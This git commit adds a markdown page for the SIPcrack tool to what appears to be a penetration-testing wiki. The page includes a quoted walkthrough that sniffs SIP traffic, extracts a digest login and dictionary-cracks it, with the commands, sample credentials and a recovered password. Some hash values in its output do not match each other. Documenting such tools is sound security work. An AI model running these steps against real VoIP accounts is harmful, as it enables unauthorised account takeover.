Added sipcrack

2025-10-29 16:59:26 +00:00 · 2014-09-25 07:34:14 -04:00 · 2014-09-25 07:34:14 -04:00 · 001ad1b731
commit 001ad1b731
parent 329db1ade7
2 changed files with 135 additions and 1 deletions
--- a/password/index.md
+++ b/password/index.md
@ -30,7 +30,7 @@ Offline Attacks
 * [rcracki_mt](../tools/rcracki_mt.md)
 * [rsmangler](../tools/rsmangler.md)
 * [samdump2](../tools/samdump2.md)
- * [sipcrack](../tools/_template.md)
+ * [sipcrack](../tools/sipcrack.md)
 * [sucrack](../tools/_template.md)
 * [truecrack](../tools/_template.md)

--- a/tools/sipcrack.md
+++ b/tools/sipcrack.md
@ -0,0 +1,134 @@
+# sipcrack
+
+Notes
+-------
+SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol.
+
+The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts.
+
+SIPcrack contains  2  programs: sipdump to capture the digest authentication and sipcrack to bruteforce the hash using a wordlist or standard input. sipdump dumps SIP digest authentications. If  a  login  is  found,  the sniffed  login  is  written  to  the  dump  file.  See 'sipdump -h' for options.
+
+sipcrack bruteforces the user's password with the dump  file  generated by  sipdump. If a password is found, the sniffed and cracked login will be updated in the dump file. See 'sipcrack -h' for options.
+
+
+Help Text
+-------
+```
+SIPcrack 0.2  ( MaJoMu | www.codito.de ) 
+----------------------------------------
+
+Usage: sipcrack [OPTIONS] [ -s | -w <wordlist> ] <dump file>
+
+       <dump file>   = file containing logins sniffed by SIPdump 
+
+       Options:                                                  
+       -s            = use stdin for passwords                   
+       -w wordlist   = file containing all passwords to try      
+       -p num        = print cracking process every n passwords (for -w)
+                       (ATTENTION: slows down heavily)           
+
+* Either -w <wordlist> or -s has to be given
+```
+
+Example Usage
+-------
+Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. 
+
+Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated. 
+
+
+Example from [aldeid](http://www.aldeid.com/wiki/Crack-VoIP)
+
+*Capturing the traffic* 
+
+Let's capture the traffic using tcpdump:
+
+```
+$ tcpdump -s0 -w sip.pcap tcp or udp
+```
+
+*Isolating the login*
+
+sipdump is a tool shipped with SIPcrack. It enables to detect the SIP login from a related traffic capture file.
+
+```
+$ cd ~/src/SIPcrack-0.3pre/
+$ ./sipdump -p ~/tmp/sip.pcap logins.dump
+
+SIPdump 0.3pre  ( MaJoMu | www.codito.de ) 
+---------------------------------------
+
+* Using pcap file '../../tmp/sip.pcap' for sniffing
+* Starting to sniff with packet filter 'tcp or udp'
+
+* Dumped login from 212.27.52.5 -> 192.168.1.29 (User: '0950236158')
+
+* Exiting, sniffed 1 logins
+$ cat logins.dump
+192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062
+"04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383
+```
+
+As you can see from the string above, the login appears in clear, and the password as a MD5 hash.
+
+Notice that we could also have used tshark to obtain the same result:
+
+```
+$ tshark -r sip.pcap -Tfields -e sip.auth | grep username
+Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\",
+nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:0950236158@freephonie.net\",
+response=\"dc59445f8ef78a615a2ad4d57835a383\",algorithm=MD5,
+opaque=\"04cc3f555880bdf\"\x0d\x0a
+Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\",
+nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:172.17.20.241:5062\",
+response=\"dc59995a8eb78f605a2ad5d57835a383\",algorithm=MD5,
+opaque=\"04cd38e646e760\"\x0d\x0a
+```
+
+*Cracking the password*
+
+sipcrack is based on dictionaries to crack the password. For the example, we have built a file containing our password.
+
+```
+$ car ~/exploits/dictionaries/test.txt
+azerty
+elephant
+test
+password
+admin
+password01
+Password01
+507ZEy@l
+oops
+oopsoops
+cat
+dog7
+monster
+
+$ ./sipcrack -w ~/exploits/dictionaries/test.txt logins.dump
+
+SIPcrack 0.3pre  ( MaJoMu | www.codito.de ) 
+----------------------------------------
+
+* Found Accounts:
+
+Num	Server		Client		User	Hash|Password
+
+1	192.168.1.29	212.27.52.5	0950236158	dc59495f8eb78a605a2ad5d57835a383
+
+* Select which entry to crack (1 - 1): 1
+
+* Generating static MD5 hash... 04cd38e646e760da129f99fa734ac1e4
+* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383')
+* Loaded wordlist: '~/exploits/dictionaries/test.txt'
+* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383')
+* Tried 10 passwords in 0 seconds
+
+* Found password: '507ZEy@l'
+* Updating dump file 'logins.dump'... done
+```
+
+
+Links
+-------
+* [cracking VOIP](http://www.aldeid.com/wiki/Crack-VoIP)